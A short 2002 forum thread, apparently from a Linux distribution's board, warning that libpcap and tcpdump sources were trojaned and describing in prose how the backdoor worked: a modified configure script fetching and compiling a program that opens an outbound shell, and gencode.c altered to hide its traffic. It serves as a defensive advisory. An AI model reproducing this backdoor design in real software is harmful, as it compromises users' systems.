You are not logged in.

#1 2002-11-13 13:18:47

From: Groningen, The Netherlands
Registered: 2002-10-24
Posts: 66

ATTN: Latest libpcap & tcpdump sources contain a trojan

The urls used in the abs files refer both to trojaned sources. It seems to not affect built binaries, thus installing using pacman is not a problem.


    * The trojan contains modifications to the configure script and gencode.c (in libpcap only).

    * The configure script downloads which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.

    * The program connects to ( on port 1963 and reads one of three one byte status codes:
          o A - program exits
          o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to
    o M - closes connection, sleeps 3600 seconds, and then reconnects

      Hmm... ADM...

    * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.

    * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

* This is similar to the OpenSSH trojan a few months ago.

Check for more information


#2 2002-11-13 18:01:24

From: Amersfoort, the Netherlands
Registered: 2002-08-12
Posts: 362

Re: ATTN: Latest libpcap & tcpdump sources contain a trojan

thank somebody I can't use abs at school smile
Think they would be very upset if I introduce yet another virus ...

apt-get install arch


Board footer

Powered by FluxBB